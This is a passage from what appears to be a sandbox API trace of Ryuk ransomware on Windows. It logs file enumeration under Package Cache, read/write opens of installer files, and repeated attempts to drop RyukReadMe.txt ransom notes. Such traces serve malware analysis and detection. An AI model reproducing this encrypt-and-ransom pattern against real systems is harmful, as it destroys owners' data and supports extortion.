cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.806] GetLastError () returned 0x5 [0140.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.806] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.806] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.806] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.806] SetLastError (dwErrCode=0x0) [0140.806] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.806] GetLastError () returned 0x5 [0140.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.806] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.806] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.806] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.807] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.807] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.807] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.807] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.807] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.807] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0140.809] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.809] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.809] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.809] SetLastError (dwErrCode=0x0) [0140.809] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.810] GetLastError () returned 0x5 [0140.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.810] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.810] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.810] SetLastError (dwErrCode=0x0) [0140.810] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.810] GetLastError () returned 0x5 [0140.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.810] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.810] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.810] SetLastError (dwErrCode=0x0) [0140.810] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.810] GetLastError () returned 0x5 [0140.810] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.810] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.810] SetLastError (dwErrCode=0x0) [0140.811] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.811] GetLastError () returned 0x5 [0140.811] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.811] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.811] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.811] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.811] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.811] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 0 [0140.811] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.811] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.812] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.812] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.812] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.812] SetLastError (dwErrCode=0x0) [0140.812] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.812] GetLastError () returned 0x5 [0140.812] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.812] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.812] SetLastError (dwErrCode=0x0) [0140.812] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.812] GetLastError () returned 0x5 [0140.812] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.812] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.813] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.813] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.813] SetLastError (dwErrCode=0x0) [0140.813] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.814] GetLastError () returned 0x5 [0140.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.814] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.814] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.814] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.814] SetLastError (dwErrCode=0x0) [0140.814] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.814] GetLastError () returned 0x5 [0140.814] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.814] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.815] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.815] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.815] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.815] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.815] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.815] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.816] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.816] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.816] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.816] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.816] SetLastError (dwErrCode=0x0) [0140.816] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.816] GetLastError () returned 0x5 [0140.816] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.816] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.816] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.816] SetLastError (dwErrCode=0x0) [0140.816] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.816] GetLastError () returned 0x5 [0140.816] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.816] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.816] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.817] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.817] SetLastError (dwErrCode=0x0) [0140.817] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.817] GetLastError () returned 0x5 [0140.817] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.817] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.817] SetLastError (dwErrCode=0x0) [0140.817] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.817] GetLastError () returned 0x5 [0140.817] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.817] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.817] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.818] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.818] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.818] SetLastError (dwErrCode=0x0) [0140.818] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.818] GetLastError () returned 0x5 [0140.818] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.818] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.818] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.818] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.818] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.818] SetLastError (dwErrCode=0x0) [0140.818] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.818] GetLastError () returned 0x5 [0140.819] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.819] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.819] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.819] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.819] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.819] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.819] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0140.820] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.820] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.820] SetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0140.820] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.820] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.820] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.820] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.820] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.821] SetLastError (dwErrCode=0x0) [0140.821] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.821] GetLastError () returned 0x5 [0140.821] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.821] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.821] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.821] SetLastError (dwErrCode=0x0) [0140.821] CreateFileW (lpFileName="C:\\ProgramData\\Package 